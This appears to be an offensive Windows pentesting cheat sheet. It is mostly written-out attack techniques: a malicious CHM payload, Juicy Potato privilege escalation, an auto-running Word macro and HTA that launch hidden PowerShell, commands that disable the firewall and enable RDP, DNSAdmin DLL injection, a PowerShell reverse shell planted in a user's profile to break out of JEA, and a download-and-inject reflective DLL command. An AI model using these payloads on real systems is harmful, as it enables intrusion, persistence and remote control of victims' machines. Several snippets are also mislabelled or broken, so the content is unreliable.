Use a Windows VM, install the required tools from here, then get the scricpt Out-CHM.ps1 and create your payload:

Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Juicy Potato

Metasploit (Details)

use windows/local/ms16_075_reflection_juicy`
set SESSION <>
set CLSID <>

Common CLSIDs for the exploit are:

  • {e60687f7-01a1-40aa-86ac-db1cbf673334}

  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}

  • {3c6859ce-230b-48a4-be6c-932c0c202048}

  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}

  • More can be found here

Word Macro

Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:

Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "<powershell command here>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
End Sub

Alternativly we can use HTA:

<script language="VBScript">
  Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell") "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
    Set wsh = Nothing
  End Function


Building and Signing MSIs

Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup

Windows Firewall

List rules

netsh advfirewall firewall show rule name=all

Disable Firewall on Windows 7 via cmd

Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Firewall on Windows 7 via Powershell

powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

Disable Firewall on any windows via cmd

netsh Advfirewall set allprofiles state off

Load DLL from System32

Windows 10


To run commands with runas, the user has to have logged in at least once.


Elevate Privileges by loading a custom DLL as DNSAdmin

# requires RSAT
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>

# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose

Then restart the service:

sc.exe stop dns
sc.exe start dns

DNS Enumeration/Exploitation Tools

Bypass JEA

When in constrained language mode (or more):

Read File:


Write File:

${C:\file.txt} = 'content'

Break out by writing a powershell profile (executed whenever powershell is started by this user):

${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

Via Script Blocks:

& { ls }

Custom function:

PS>function xct { ls };

These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.

RCE via Cab Files

Reflectivly load DLL into explorer.exe

String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

Via Invoke-ReflectivePEInjection.ps1 .

Dump Sticky Note Contents


Last updated